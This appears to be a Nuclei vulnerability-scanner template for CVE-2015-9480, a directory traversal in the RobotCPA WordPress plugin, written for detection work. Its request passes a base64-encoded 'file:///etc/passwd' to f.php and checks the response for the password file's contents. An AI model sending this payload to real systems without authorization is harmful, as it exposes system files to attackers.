id: CVE-2015-9480 info: name: WordPress Plugin RobotCPA 5 - Directory Traversal author: daffainfo severity: high reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 tags: cve,cve2015,wordpress,wp-plugin,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2015-9480 cwe-id: CWE-22 description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter." requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" part: body - type: status status: - 200